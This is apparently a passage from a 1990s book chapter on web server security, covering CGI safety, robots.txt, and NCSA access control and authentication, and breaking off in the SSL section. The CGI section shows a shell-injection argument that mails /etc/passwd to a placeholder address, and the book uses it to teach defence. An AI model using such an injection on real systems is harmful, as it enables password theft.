|
Internet security is a hot topic these days. Plenty of fear and loathing has been spread around concerning so-called hackers who break into systems using only a telephone, a few resistors, and a spoon, and wreak havoc with the files that are stored on those systems. Because you've got a Web server running, you have a system on the Internet, and based on the rumors, you may be worried about the security of that system.
Much of the fear about security on the Internet is media hype; although the threat of potential damage to your system from intruders is a real one, it's not as commonplace as the newspapers would have you believe. The threat of an outside intruder being able to get into your system through your Web server is a small one. HTTP is a small and simple protocol with few holes or obvious chances for external access. In fact, you are much more likely to have problems with internal users either intentionally or unintentionally compromising your system by installing dangerous programs or allowing access from the outside that you hadn't intended them to provide.
I don't have the space to provide a full tutorial on Internet security in this book; there are plenty of books out there that will help you protect your system (in particular, check out Internet Firewalls and Network Security, from New Riders Publishing; Practical UNIX Security, by Garfinkel & Spafford, from O'Reilly & Associates; and Firewalls and Internet Security, by Cheswick and Bellovin, from Addison-Wesley). What I can do is provide some basic ways in which you can protect your Web server from both the outside and the inside. And I'll discuss access control and authorization, which are simple ways to protect published Web presentations from unauthorized eyes.
In particular, this chapter will cover the following topics:
- Hints for protecting your Web server and the files on it from intruders and mischief
- Writing CGI scripts that don't open security holes on your system
- Access control and authentication: what they mean, how secure they are, and how to set them up in NCSA-style servers
- Encryption and secure connections on the Web using SSL
Note |
Although I have a basic understanding of network security, I don't claim to be an expert. I had help on this chapter from Eric Murray (the same one who also wrote the Perl scripts in Chapter 20, "Useful Forms and Scripts"), who has done Internet security administration and programming for many years. |
So you want to protect your Web server against things that go bump in the night. You've come to the right place. These hints will help protect your system and your files not only from external intruders, but also from internal users who might cause mischief either intentionally or unintentionally in the course of setting up their Web presentations.
Note that making your server more secure generally also makes your server less fun. Two of the biggest security holes for Web servers are CGI scripts and server includes, which give you the ability to do forms and to automatically generate HTML files on-the-fly. Depending on the security goals for your server and the features you want to have available in your Web server, you might choose to follow only some of the hints in this chapter or to enable some of them only for especially trusted users.
By default, most UNIX servers are configured to run HTTPD as the user Nobody, who belongs to the group Nogroup. Usually, Nobody and Nogroup have limited access to the system on which they run. Nobody and Nogroup can write only to a few directories, which means they cannot delete or change files unless they have explicit access to them.
Having your Web server run under this restricted user is a very good idea. It means that if someone manages to break into your system using your Web server, she is limited in the amount of damage she can do. If your server is running as root, intruders can potentially do enormous damage to your system and your files depending on how much access they manage to get.
Of course, the disadvantage of running as Nobody is that if you actually do want the server to change a file (for example, as part of a CGI script), you have to allow the Nobody user access to that file, usually by making it world-writable. When a file is world-writable, someone from inside the system can modify it as well. You've traded one form of security for another.
There are two solutions to this problem. One is to make sure that all files that need to be writable by Nobody are owned by Nobody, using the chown command. (You won't be able to write to them after that, so make sure you know what you're doing.) The second solution is to create a special group with a limited number of users, including Nobody, and then run the HTTPD server as that group. (You can change the group in your configuration files.) That way you can make files writable by that group, and the server will also have access to them.
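Here's a minimal sketch of both approaches (the file name and the group name wwwgrp are placeholders; the Group directive goes in your httpd.conf):

# Solution 1: make the file owned by Nobody
chown nobody /home/www/data/guestbook.html

# Solution 2: create a group (here, wwwgrp) that includes Nobody,
# tell the server to run as that group in httpd.conf:
#     Group wwwgrp
# and then make the file group-writable:
chgrp wwwgrp /home/www/data/guestbook.html
chmod g+w /home/www/data/guestbook.html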
Because CGI scripts allow anyone on the Web to run a program on your server based on any input they choose to supply, CGI scripts are probably the largest security risk for your site. By allowing CGI scripts (either as regular scripts, as form submissions, or as NCSA includes), you are potentially opening up your server to break-ins, damage, or simply swamping the system with multiple script requests that end up being too much for the CPU to handle.
Probably the best thing you can do for your server, in terms of security, is to disallow all CGI scripts entirely, or at least limit them to trusted published scripts that you have tested and are sure will not harm your system. But because forms and includes are lots of fun, turning everything off might be an extreme measure.
What you can do is limit the use of CGI on your system. Allow scripts only in a central location, such as a single cgi-bin directory. Make your scripts generic so that multiple users can use them. If you allow your users to install scripts, have them submit the scripts to you first so you can check them for obvious security holes that might have been introduced unwittingly.
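In the NCSA server, a central scripts directory is set up with the ScriptAlias directive in srm.conf; a minimal sketch (the paths are placeholders for wherever your server actually lives) looks like this:

ScriptAlias /cgi-bin/ /usr/local/etc/httpd/cgi-bin/

With only this one directory enabled, no one can run a script that hasn't been installed there, presumably by you.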
Later in this chapter, in "Hints on Writing More Secure CGI Scripts," you'll find more information on making sure the CGI scripts you have do not create potential holes in your system.
A symbolic link is an alias from one file to another. If you create a link to a Web page, you can refer to that link in a URL, and the Web server will happily load the page to which that link points.
If you use CERN's HTTPD, there is nothing keeping your users from making symbolic links from their own Web trees to other files anywhere on your file system, which makes those files accessible to anyone on the Web. You might consider this a feature or a bug, depending on how concerned you are about having your files linked to the outside world.
In NCSA, you can disable symbolic links; more precisely, the links can still exist, but the Web server will not follow them. To do this, make sure your access.conf does not have a FollowSymLinks option in it (you'll find out more about this later in this chapter). An alternative option, SymLinksIfOwnerMatch, allows the server to follow a symbolic link only if the owner of the file and the owner of the link are the same user, which is a more secure way of still allowing symbolic links within a single user's tree.
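For example, a sketch of an access.conf entry (the directory name is a placeholder) that permits only same-owner links might look like this:

<DIRECTORY /home/www>
Options Indexes SymLinksIfOwnerMatch
</DIRECTORY>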
Server includes, for all the power they provide, are a security hole, particularly the ones that run scripts (exec includes). By allowing server includes, you are allowing data to be generated and passed outside your server on-the-fly, and you might not be able to control what data is being sent out or what effect that data could have on your system.
Note |
Turning off server includes also speeds up the time it takes to send files to the browser because the files do not need to be parsed beforehand. |
If you must allow server includes, you might want to allow only regular includes and not #exec includes by using the IncludesNoExec option. This allows the simpler include mechanisms such as #include and #echo, but it disables scripts, providing a happy medium for security and fun.
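In an .htaccess file, for example, a single line does it:

Options IncludesNoExec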
Again, most servers are set up so that if a user requests a URL that ends in a directory, a default filename (usually index.html) is appended to that URL. But what if the directory doesn't contain a file called index.html? Usually the server will send a listing of the files in that directory, in much the same way that you get a listing for files in an FTP directory (see Figure 28.1).
Figure 28.1 : A directory listing.
Is directory indexing a security problem? It isn't if you don't mind your readers seeing all the files in the directory. However, you might have private files in there or files you aren't ready to release to the world yet. By allowing directory indexing and not providing a default file, you're allowing anyone to browse that directory and choose which files to look at.
There are two ways to get around this:
- Make sure every directory contains a default file (usually index.html), even if that file is nothing more than an empty page, so the server never has to generate a listing.
- Turn off directory indexing by leaving the Indexes value out of the Options command for that directory (you'll learn more about Options later in this chapter).
Spiders (sometimes called robots) are programs that automatically explore the Web. They jump from link to link and page to page, note the names and URLs of files they find, and sometimes store the contents of those pages in a database. Those databases of pages that they find can then be searched for keywords, allowing users to search Web pages for a word, phrase, or other search key.
New Term |
Spiders or robots are programs that follow links between pages, storing information about each page they find. That information then can usually be searched for specific keywords, providing the URLs of the pages that contain those keywords. |
Note |
Sounds like a great idea, doesn't it? Unfortunately, the Web is growing much too fast for the spiders to be able to keep up. Word has it that some of the best spiders, running full-time on very expensive and fast machines, are taking six months to traverse the Web. Given that the Web is growing much faster than that, it's unlikely that any one spider can manage to keep up. However, spiders such as WebCrawler (http://www.webcrawler.com/) and AltaVista (http://www.altavista.digital.com/) can provide an index of a good portion of the Web in which you can search for particular strings. |
The problem with spiders and your Web server is that a poorly written spider can bring your server to its knees with constant connections, and it can end up mapping files inside your server that you don't want to be mapped. For these reasons, a group of spider developers got together and came up with a way that Webmasters can exclude their servers, or portions of their servers, from being searched by a spider.
To restrict access to your server from a spider, create a file called robots.txt and put it at the top level of your Web hierarchy so that its URL is http://yoursite.com/robots.txt.
The format of robots.txt is one or more lines describing specific spiders that you'll allow to explore your server (called user-agents), and one or more lines describing the directory trees you want excluded (disallowed). In its most basic form ("No Spiders Wanted"), a robots.txt file looks like this:
User-agent: *
Disallow: /
If you don't want any spiders to explore a hierarchy called data (perhaps it contains lots of files that aren't useful except for internal use), your robots.txt might look like this:
User-agent: *
Disallow: /data/
You can allow individual trusted spiders into your server by adding additional User-agent and Disallow lines after the initial one. For example, the following robots.txt file denies access to all spiders except WebCrawler:
User-agent: *
Disallow: /

# let WebCrawler in
User-agent: WebCrawler/0.00000001
Disallow:
Note that robots.txt is checked only by spiders that conform to the rules. A renegade spider can still wreak havoc on your site, but installing a robots.txt file will dissuade most of the standard robots from exploring it.
You can find out more about spiders, robots, and the robots.txt file; hints for dealing with renegade spiders; and the names of spiders for your User-agent fields, at http://web.nexor.co.uk/mak/doc/robots/robots.html.
Previously, I mentioned that turning off CGI scripts was probably the first thing you should do to make your server more secure. But without CGI scripts, you can't have forms, search engines, clickable images, or server-side includes. You lose the stuff that makes Web presentations fun. So, perhaps shutting off CGI isn't the best solution.
The next-best solution is to control your CGI scripts. Make sure that you're the only one who can put scripts into your CGI directory, or write all the scripts yourself. The latter is perhaps the best way you can be sure that those scripts are not going to have problems. Note that if someone is really determined to do damage to your system, that person might try several different routes other than those your Web server provides. But even a small amount of checking in your CGI scripts can make it more difficult for the casual troublemakers.
The best way to write secure CGI scripts is to be paranoid and assume that someone will try something nasty. Experiment with your scripts and try to anticipate what sorts of funny arguments might get passed into your script from forms.
Funny arguments? What sort of funny arguments? The most obvious would be extra data to a shell script that the shell would then execute. For example, here's part of my original version of the pinggeneric script that I described in Chapter 19, "Beginning CGI Scripting":
#!/bin/sh
ison=`who | grep $1`
The pinggeneric script, as you might remember, takes a single user as an argument and checks to see whether that user is logged in. If all you get as an argument is a single user, things are fine. But you might end up getting an argument that looks like this:
foo; mail me@host.com </etc/passwd
That's not a legitimate argument, of course. That's someone playing games with your script. But what happens when your script gets that argument? Bad things. Basically, because of the way you've written things, this entire line ends up getting executed by the shell:
who | grep foo; mail me@host.com </etc/passwd
What does this mean? If you're not familiar with how the shell works, the semicolon is used to separate individual commands. So in addition to checking whether foo is logged in, you've also just sent your password file to the user me@host.com. That user can then try to crack those passwords at his or her leisure. Oops.
So what can you do to close up security holes like this and others? Here are a few hints:
- Never pass raw input from a form or a URL directly to the shell. Check each argument against the narrow pattern you expect (a user name, for example, should contain only letters and digits) and reject anything else.
- Be especially wary of shell metacharacters in the input: semicolons, backquotes, pipes, and redirection characters like the ones in the example above.
- Use full pathnames for any commands your scripts call so that an intruder can't substitute a different program with the same name.
- Test your scripts with deliberately hostile input before making them available, as shown in the sketch that follows.
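As an illustration only (a minimal sketch, not the original pinggeneric script), here's one way that fragment could check its argument before handing it to the shell:

#!/bin/sh
# Reject any argument that isn't strictly alphanumeric
# (or is empty) before using it in a command.
case "$1" in
  *[!a-zA-Z0-9]*|"")
    echo "Content-type: text/plain"
    echo ""
    echo "Bad user name."
    exit 1
    ;;
esac
ison=`who | grep "$1"`

With this check in place, the argument foo; mail me@host.com </etc/passwd is rejected before the shell ever sees the semicolon.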
For more information about making your CGI scripts more secure, you might want to check out the collection of CGI security information Paul Phillips keeps at http://www.cerf.net/~paulp/cgi-security/.
When you set up a Web server and publish your pages on it, all those pages can be viewed by anyone with a browser on the Web. That's the point, after all, isn't it? Web publishing means public consumption.
Actually, there could be some Web files published that you don't really want the world to see. Maybe you have some internal files that aren't ready for public consumption yet, but you want a few people to be able to see them. Maybe you want to have a whole Web presentation that is available only to sites within your internal network (the "intranet" as it's popularly known).
For this reason, Web servers provide access control and authentication, features you can turn on and assign to individual directories and files on your server. Those protected files and directories can live alongside your more public presentations. When someone who isn't allowed tries to view the protected stuff, the Web server won't let them.
In this section, you'll learn everything you ever wanted to know about access control and authentication in the NCSA Web server and its brethren, including all the basics, how they actually work, how secure they actually are, and how to set up access control in your own server.
Note that even if you're not using an NCSA-like Web server, all the concepts in this section will still be valuable to you. Web authentication works the same way across servers; usually it's just different files that need editing in order to set it up. With the knowledge you gain from this section, you can usually go to your specific server's configuration documentation and figure it out from there.
Note |
Access control and authentication are pretty dry and technical stuff. Unless you're interested in this or looking to get this set up on your own system, you're probably going to end up bored to tears by the end of this section. I won't be at all offended if you decide you'd rather go see a movie. Go on. Have a good time. |
First, let's go over some of the specifics of what access control and authentication mean and how they work with Web servers and browsers.
Access control means that access to the files and subdirectories within a directory on your Web server is somehow restricted. You can restrict access by Internet host so that, for example, your files can be read only from within your internal network, or you can control access on a per-user basis by setting up a special file of users and passwords for a given set of files.
If your files have been protected by host names, when someone from outside your set of allowed hosts tries to access your pages, the server returns an Access Denied error. (Actually, to be more specific, it returns a 403 Forbidden error.) Access is categorically denied (see Figure 28.2).
Authentication is the process that allows a user trying to access your files from a browser to enter a name and password and gain access to those files. When the server has verified that a user on a browser has the right user name and password, that user is considered to be authenticated.
New Term |
Authentication allows you to control access to a set of files so that readers must enter a name and password to be able to view them. |
Authentication requires two separate connections between the browser and the server, with several steps involved. Figure 28.3 shows the process.
The following steps explain the process in greater detail:
1. The browser requests a protected file just as it requests any other URL.
2. Instead of sending back the file, the server sends back a 401 Unauthorized response indicating that the file is protected and naming the kind of authentication and the realm (the AuthName) to use.
3. The browser prompts the user for a name and password (see Figure 28.4).
4. The browser requests the file again, this time including the name and password as part of the request.
5. The server checks the name and password against its password file. If they match, it sends back the file; if not, it sends back another error, and the browser can prompt the user again.
Figure 28.4 : Name and password required.
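To make the exchange concrete, here's roughly what the two requests and the server's challenge look like on the wire (the file name, realm, user name, and password are all hypothetical):

GET /protected/index.html HTTP/1.0

HTTP/1.0 401 Unauthorized
WWW-Authenticate: Basic realm="Subscribers Only"

GET /protected/index.html HTTP/1.0
Authorization: Basic d2VibWFzdGVyOnNlY3JldA==

The string after the word Basic is just the name and password joined by a colon and encoded; as you'll see later in this chapter, that encoding is not encryption.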
Note that when a user has been authenticated, that user can continue to access different pages from the same server and directory without having to re-enter his or her name and password. Also, that user name is logged to the access log file for your server each time the user accesses a file or submits a form, and it is available as the REMOTE_USER environment variable in your CGI scripts.
Note |
It is considered extremely impolite in the Web community to use authentication information for anything other than informational purposes. Don't abuse the information you can get from authentication. |
To set up access control, you have to specially configure your server. Again, in this chapter, I'll talk specifically about the CERN and NCSA servers on UNIX systems; your server might have a similar method of accomplishing access control. The NCSA server enables you to set up access control for your files on different levels, including what you want to protect and whom you want to be able to access it.
NCSA enables you to protect single directories or groups of directories. For example, you can protect all the files contained in a single directory and its subdirectories, or all the files contained in all the directories called public_html (in the case of user directories).
NCSA does not have file-level protection, although you can put a file you want to protect in its own subdirectory and then restrict access to that directory.
NCSA also allows access control based on the host, domain, or full or partial IP address of the browser making the connection; for example, you can allow connections only from the same system as the server or deny connections from a particular domain or system.
In terms of user-level access control, NCSA allows user authentication as an individual or as part of a group (for example, allowing in only people who are part of the group Administration). User and group access is set up independently of the system's own user and group access files.
You can also have multiple password and group files on the same machine for different access control schemes. For example, you might have a subscription-based Web presentation that requires one set of users and groups, and another presentation for sharing industry secrets that requires another set of users and groups. NCSA enables you to set up different password realms so that you can have different forms of access control for different subdirectories.
Access control and authentication provide only a very simple level
of security for the files
on your server by preventing curious users from gaining access
to those files. Determined users will still be able to find ways
around the security provided by access control and authentication.
In particular, restricting access to your files based on host names or IP addresses means only that systems claiming to have the specified host name or IP address can gain access to your files. There is no way to verify that a system calling itself a trusted system is indeed that system.
In terms of the security of authentication, most servers support what is called basic authentication. Basic authentication is the process I described in "What Do Access Control and Authentication Mean?" where the browser and server talk to each other to get a name and password from the reader. The password that the user gives to the browser is sent over the network encoded (using base64, a simple, reversible encoding) but not encrypted. This means that if someone were to come across the right packet or intercept the browser's request, that person could easily decode the password and gain access to the files on the Web server using that name and password.
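For example, the hypothetical authorization header shown earlier in this chapter,

Authorization: Basic d2VibWFzdGVyOnNlY3JldA==

decodes trivially to webmaster:secret. No key or secret is needed to reverse the encoding; anyone who captures the packet has the password.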
A more secure form of authentication involves using a browser that supports encrypted authentication (recent versions of NCSA Mosaic have authentication schemes based on Kerberos and MD5, which will presumably be supported in the NCSA server as well), or using basic authentication over an encrypted connection such as the one Netscape's SSL provides. You'll find out more about SSL later in this chapter.
In this section, you'll learn all about setting up access control and authentication in the NCSA server (and servers based on it, such as Apache and WinHTTPD), including general instructions for creating global and per-directory access files, controlling access by IP and host, and adding authentication for users and groups. After this section, you'll also know a little more about how NCSA uses access control to control the various features of the NCSA server such as CGI scripts and server includes.
NCSA's method of access control and authentication can operate on a global basis, on a per-directory basis, or both, with special access control files in subdirectories overriding the values in the global configuration file and in other access control files in parent directories (see Figure 28.5).
Figure 28.5 : Access control in NCSA.
The default access control file for the entire server is access.conf, in the conf directory with the httpd.conf and srm.conf files. This file is usually writable only by root so that you as the Webmaster can keep control of it.
The per-directory access control file is usually called .htaccess. (You can change that name in your srm.conf file using the AccessFileName directive.) Because anyone can create an htaccess file, your users can administer the access control for their own presentations without needing to contact you or reboot the server.
Note |
Anyone can create a .htaccess file. What they can do in that file, however, is determined by you in the global access.conf. Users will not be able to override your default settings if you don't want them to. You'll learn about how to do this later. |
Configuring the access.conf file and the htaccess files for access control and authentication works in similar ways. First, I'll describe the htaccess file because it is the more commonly used and the easier of the two.
The htaccess file can contain several general directives and a <LIMIT> section. It might look something like this:
Options Includes
AuthType Basic
AuthName "Subscribers Only"
AuthUserFile /home/www/magazine/.htpasswd
AuthGroupFile /home/www/magazine/.htgroup
<LIMIT GET>
require group subscribers
</LIMIT>
You'll learn what all of this means in the following sections. The important thing to realize is that the information contained in an htaccess file affects all the files in that directory and all the files in any subdirectories. To change the values for a subdirectory, just add a different htaccess file.
The global access.conf file has a similar format, except that you need some way of indicating which directory the directives and <LIMIT> affect. You do that in access.conf by enclosing all the access control directives inside a <DIRECTORY> section, like this:
<DIRECTORY /home/www/magazine>
Options Includes
AuthType Basic
AuthName "Subscribers Only"
AuthUserFile /home/www/magazine/.htpasswd
AuthGroupFile /home/www/magazine/.htgroup
<LIMIT GET>
require group subscribers
</LIMIT>
</DIRECTORY>
Note that the directory a section affects is specified in the opening <DIRECTORY> line and is the actual file system directory name. To set up access control for subdirectories, specify those subdirectories in separate <DIRECTORY> sections after the first one (don't nest them). You can use as many <DIRECTORY> sections as you want.
Note |
<DIRECTORY> and <LIMIT> might look like HTML tags, but they're not. They are not part of any HTML specification and are used only for access control. |
Of course, you're allowed to have both a default access control set up in access.conf and individual ones in htaccess files. This affords you and your users a great deal of flexibility in how to set up Web presentations.
The simplest form of access control for a directory is to restrict access by host, or (more correctly) to restrict access by a host's host name, domain, or full or partial IP address. Only browsers running on systems that match the pattern will be allowed access to the protected file.
NCSA allows several ways of restricting access by host. You can specify the hosts that are allowed access, the hosts that are denied access, or both. The following is what a simple denial looks like. (This one is from an .htaccess file. Remember, if you put this in the global access.conf file, put a <DIRECTORY> clause around it with a specific directory name.)
<LIMIT GET>
deny from .netcom.com
</LIMIT>
This LIMIT statement says that no hosts from inside the netcom.com domain can access the files from within this subdirectory. To allow hosts to access your files, use the allow command:
<LIMIT GET>
deny from .netcom.com
allow from netcom16.netcom.com
</LIMIT>
The hosts you choose to allow or deny can be any of several kinds of hosts or IP addresses:
- A full host name (for example, netcom16.netcom.com)
- A partial domain name beginning with a dot (for example, .netcom.com), which matches every host in that domain
- A full IP address (for example, 192.100.58.2)
- A partial IP address (for example, 192.100), which matches every host whose address begins with those numbers
- The keyword all, which matches every host
If you have both allow and deny commands, the deny command is evaluated first, and the allow can provide exceptions to that command. For example, to restrict access to a directory so that only my home system can access it, I would use this <LIMIT> statement:
<LIMIT GET>
deny from all
allow from death.lne.com
</LIMIT>
To reverse the order in which deny and allow are evaluated, use the order command, like this:
<LIMIT GET>
order allow,deny
allow from netcom.com
deny from netcom17.netcom.com
</LIMIT>
It's a good idea to use order all the time so that you don't have to remember which is the default order and end up making a mistake. Note that the actual order in which the allow and deny commands appear isn't important. It is order that makes the difference.
By default, any hosts that you don't explicitly deny or allow in a <LIMIT> are allowed access to your directory. There are two ways to fix that:
- Use deny from all, and then add allow commands for the exceptions, as in the previous example.
- Use the order mutual-failure command.
The order mutual-failure command says to let in all hosts from allow, deny all hosts from deny, and then deny everyone else.
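Here's a sketch of mutual-failure in use (the host names are placeholders):

<LIMIT GET>
order mutual-failure
allow from death.lne.com
deny from netcom17.netcom.com
</LIMIT>

With this <LIMIT>, death.lne.com gets in, netcom17.netcom.com is turned away, and so is every host that appears on neither list.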
The second form of access control is based on a set of acceptable users. To allow access to protected files by specific users, you need to create a special file containing those users' names and passwords. This file is entirely different from the password file on the system itself, although both look similar and use similar methods for encrypting and decrypting the passwords.
You can have any number of independent password files for your Web server, depending on the realm of password schemes you want to use. For a simple server, for instance, you might have only one. For a server with multiple presentations that each require different kinds of authentication, you might want to have multiple password files.
Where you put your password files is up to you. I like to have a central admin directory in which my password files are located, with each one named after the scheme that uses it. Traditionally, however, the password file is called .htpasswd and is contained in the same directory as your .htaccess file so that both are together, which makes it easy to make changes to both and to keep track of which password file goes with which set of directories.
To add a user to a password file, use the htpasswd command, which is part of the NCSA distribution (its source is in the support directory). The htpasswd command takes two arguments: the full pathname of the password file, and a user name. If this is the first user you are adding to the password file, you also have to use the -c option (to create the file):
htpasswd -c /home/www/protected/.htpasswd webmaster
This command creates a password file called .htpasswd in the directory /home/www/protected and adds the user webmaster. You will be prompted for the webmaster's password. The password is encrypted, and the user is added to the file:
webmaster:kJQ9igMlauL7k
You can use the htpasswd command to add as many users to the password file as you want (but you don't have to use the -c option more than once for each password file).
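For example, adding a second user to the existing file looks like this (the user name is hypothetical):

htpasswd /home/www/protected/.htpasswd editor

You'll be prompted for editor's password, and a new line is appended to the file.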
Note |
If you try to use htpasswd to add a user to a password file and the user already exists, htpasswd assumes you just want to change that user's password. If you want to delete a user, edit the file and delete the appropriate line. |
When you have a password file set up, go back and edit your access file (either the .htaccess file or the global access.conf). You'll need to add several authentication directives and a special command. Here's what the new access file might look like:
AuthType Basic
AuthName Webmaster Only
AuthUserFile /home/www/webmaster/.htpasswd
<LIMIT GET>
require user webmaster
</LIMIT>
This example protects the files contained in the directory /home/www/webmaster so that only the user webmaster can access them.
The AuthType directive indicates that you will use Basic authentication to get the user name and password from your reader. You probably don't have much of a choice for the authorization type, given that Basic is the only form of authentication currently implemented in most servers. Actually, you don't need to include this line at all, but it's a good idea to do so in case new forms of authentication do appear.
The AuthName is used by the browser in the name and password dialog box to tell your users which user name and password to enter. If you have multiple forms of authentication on the same server, your users may need some way of telling them apart; AuthName provides an indication of the service they're trying to access. If you don't include an AuthName, the dialog will say UNKNOWN, which is somewhat confusing. Figure 28.6 shows the password dialog box where the value of AuthName is Laura's Stuff.
The AuthUserFile directive tells the server which password file to use when it does get a user and a password back from the browser. The path to the password file is a full system path as it appears on your file system.
Finally, the familiar <LIMIT> is where you indicate exactly which users are allowed into these protected directories by using the require user command. Here you can specify individual users who are allowed access or multiple users separated by commas:
require user jill,bob,fred,susan
You can also allow access to all the users in the password file by using require with the valid-user keyword instead of user, like this:
require valid-user
The valid-user keyword is a shorthand way of including everyone in the password file as part of the access list.
You can also use both require and deny, or allow, to further limit access control not only to specific users but specific users on specific hosts. For example, this <LIMIT> would limit access to the user maria at the site home.com:
<LIMIT GET>
require user maria
deny from all
allow from .home.com
</LIMIT>
Any access control based on hosts takes precedence over user or group authentication. It doesn't matter whether Maria is Maria; if she's on the wrong system, the server will deny access to the files before she gets to enter her name and password.
Groups are simply a way of providing an alias for a set of users so that you don't have to type all their names in the require command or allow everyone in the password file access, as you would with valid-user. For example, you might have a group for engineers, writers, or webmasters. When you have a group set up, access is given only to those authenticated users who are also part of that group.
To set up a group, you define the group name and who belongs to that group in a Web group file. The group file is located somewhere on your file system (traditionally, it's called .htgroup and kept in the same directory to which it refers) and looks like this:
mygroup: me, tom, fred, jill
anothergroup: webmaster, mygroup
Note |
Like password files, Web group files have nothing to do with the UNIX system group files, although the syntax is similar. |
Each line defines a group and contains the name of the group as the first field, followed by the users that make up that group.
The users for the group can include user names (which must be defined in a Web password file) or names of other groups. New groups must be defined before they can be used in other groups.
When you have a group file set up, you can protect a directory based on the users in that group. This is indicated in your configuration file in much the same way that user access was indicated, with the addition of the AuthGroupFile directive, which indicates the group file that you'll be using:
AuthType Basic
AuthName Web Online!
AuthUserFile /home/www/web-online/.htpasswd
AuthGroupFile /home/www/web-online/.htgroup
<LIMIT GET>
require group hosts,general
</LIMIT>
To restrict access to the directory to users within the group, use the require group command with the name of the group (or groups, separated by commas). Note that if you have both require user and require group commands, all those values (all the users in the require user list and all the users in the groups) are allowed access to the given files.
Just as with require user, you can further restrict the access by host name by including allow and deny lines along with the require command. For example, this <LIMIT> would limit access to the group managers at the site work.com:
<LIMIT GET>
require group managers
deny from all
allow from .work.com
</LIMIT>
NCSA's access control mechanisms apply to more than simply allowing users access to individual files. They also enable you to control which features are allowed within certain directories, including server includes, directory indexing, or CGI scripts in individual directories.
Each access configuration file, including each <DIRECTORY> part of the global access.conf and each .htaccess file, can have an Options command that indicates which options are allowed for that directory and its subdirectories. By default, if no Options command is specified, all options defined by the parent directory (or the access.conf file) are allowed. Here's a typical Options line:
Options Indexes IncludesNoExec
You can include any of the options in a single Options command. Only the options that are listed are allowed for that directory. However, <DIRECTORY> sections for subdirectories in the access.conf file, and .htaccess files in those subdirectories, can contain their own Options commands that override the defaults. To prevent this, you can use the AllowOverride directive in your access.conf file (and only in that file) to indicate which options can be overridden in subdirectories. See the following section, "NCSA Options and Access Control Overrides," for more information about AllowOverride.
Table 28.1 shows the possible values of the Options command:
Option | What It Means |
None | No options are allowed for this directory. |
All | All options are allowed for this directory. |
FollowSymLinks | If symbolic links exist within this directory, browsers can access the files they point to by accessing the link. This can be a security hole if your users link to private system files. |
SymLinksIfOwnerMatch | Symbolic links will be followed only if the owner of the link is also the owner of the file. This option is more secure than FollowSymLinks because it prevents links to random system files but allows links within your user's own trees. |
ExecCGI | This option allows CGI scripts to be executed within the directory. You must also have an AddType directive in srm.conf or in a .htaccess file for allowing .cgi files for this to work. Only enable this option for users that you know you can trust. |
Includes | This option allows server-side includes. You must also have an AddType directive in srm.conf or in an .htaccess file for allowing parsed HTML files (see Chapter 27, "Web Server Hints, Tricks, and Tips"). |
IncludesNoExec | This option allows server includes except those that execute scripts (#exec includes). It is more secure than Includes because it prevents scripts from being executed while still allowing the simpler server includes such as #echo and #include. |
Indexes | This option allows directory indexing for this directory, which enables users to see all the files within that directory. |
Note |
Many of the options available in the NCSA server are security holes. Depending on how secure you want your server to be, you might want to disable most or all of these options in your global access.conf file. Also keep in mind that, by default, all options are turned on. So if you do not have an access.conf file or if you don't include an Options line, all the options are available to anyone on your server. |
Overrides determine which of the access controls and options you have set up in your access.conf can be overridden in subdirectories. By default, the NCSA server allows all overrides, which means that anyone can put an .htaccess file anywhere and change any of your default access control options. You can prevent the options you've specified in access.conf from being overridden by using the AllowOverride directive, like this:
AllowOverride Options AuthConfig
There is only one AllowOverride directive, in your access.conf file (and it can be specified only once). AllowOverride cannot be further restricted in .htaccess files.
From a security standpoint, the best way to protect your server is to set the default access control and Options in your access.conf file and then turn off all overrides (AllowOverride None). This prevents your users from creating their own .htaccess files and overriding any of your specifications. But you might want to allow one or more overrides for subdirectories to give your users more control over their files, depending on how your server is set up.
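Here's a sketch of a locked-down access.conf entry (the directory name is a placeholder):

<DIRECTORY /home/www>
Options Indexes
AllowOverride None
</DIRECTORY>

With AllowOverride None in place, any .htaccess files your users create in subdirectories are simply ignored.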
Table 28.2 shows the possible values of AllowOverride.
AllowOverride Value | What It Means |
None | Nothing can be overridden in .htaccess files for subdirectories. |
All | Everything can be overridden. |
Options | Values for the Options directive can be added to .htaccess files. |
FileInfo | Values for the AddType and AddEncoding directives, for adding support for MIME types, can be added to .htaccess files. |
AuthConfig | Values for the AuthName, AuthType, AuthUserFile and AuthGroupFile directives for authentication can be added to the .htaccess files. |
Limit | The <LIMIT> section can be added to the .htaccess files. |
The Internet is inherently not a very secure place, particularly for very sensitive information that you don't want intercepted or viewed by prying eyes. Although basic authentication in World Wide Web servers is minimally acceptable, it is by no means secure.
For true security on the Web, you need to use some form of encryption and authentication between the browser and the server to prevent the information between the two from being seen or changed by an unwanted third party. The most popular mechanism for secure connections on the Web at the moment is the SSL mechanism as developed by Netscape.
SSL, which stands for Secure Sockets Layer, encrypts the actual network connection between the browser and the server. Because it's an actual secure network connection, you could theoretically use that connection for more than Web transactions; for example, for secure Telnet or Gopher.
Note |
SSL is one of two proposals for sending encrypted data over the Web; the other is SHTTP. SHTTP, developed jointly by CommerceNet, EIT, and NCSA, is an enhanced version of the HTTP protocol that allows secure transactions in the form of signed or encrypted documents transmitted over a regular HTTP connection. Although SHTTP and SSL each have their technical advantages for different purposes, SSL seems to have the advantage in the marketplace. If you're interested in learning more about SHTTP, see the information at http://www.eit.com/projects/s-http/. |
In this section I'll talk about SSL, how it works cryptographically, how browsers and servers communicate using SSL connections, and how to set up SSL in your own server.
SSL works on three basic principles of cryptography: public key encryption and digital certificates to set up the initial greeting and verify that the server is who it says it is, and then special session keys to actually encrypt the data being transmitted over the Internet.
Note |
All the information in this section is, admittedly, very much of a simplification. Cryptography is a fascinating but very complicated form of mathematics that doesn't lend itself well to description in a few pages of a "Teach Yourself" book. If you're interested in looking deeper into cryptography, you might want to check out books that specialize in computer security and cryptography such as Applied Cryptography by Bruce Schneier, Wiley Press. |
Public key encryption is a cryptographic mechanism that ensures the validity of data as well as verifying whom it comes from. The idea behind public key encryption is that every party in the transaction has two keys: a public key and a private key. Information encrypted with the public key can be decrypted only with the private key. Information encrypted with the private key, in turn, can be decrypted only with the public key.
The public key is widely disseminated in public. The private key, however, is kept close to home. With both keys available, an individual can then use public key encryption in the following ways:
- To send someone a private message, encrypt it with that person's public key. Only the holder of the matching private key can decrypt it.
- To prove that a message came from you, encrypt (sign) it with your private key. Anyone can decrypt it with your public key, and the fact that your public key works proves that the message was encrypted with your private key.
The problem with public key encryption, particularly on the Net, is with verifying that the public key someone gives you is indeed their public key. If company X sends you their public key, how can you be sure that someone else isn't masquerading as company X and giving you their own public key instead?
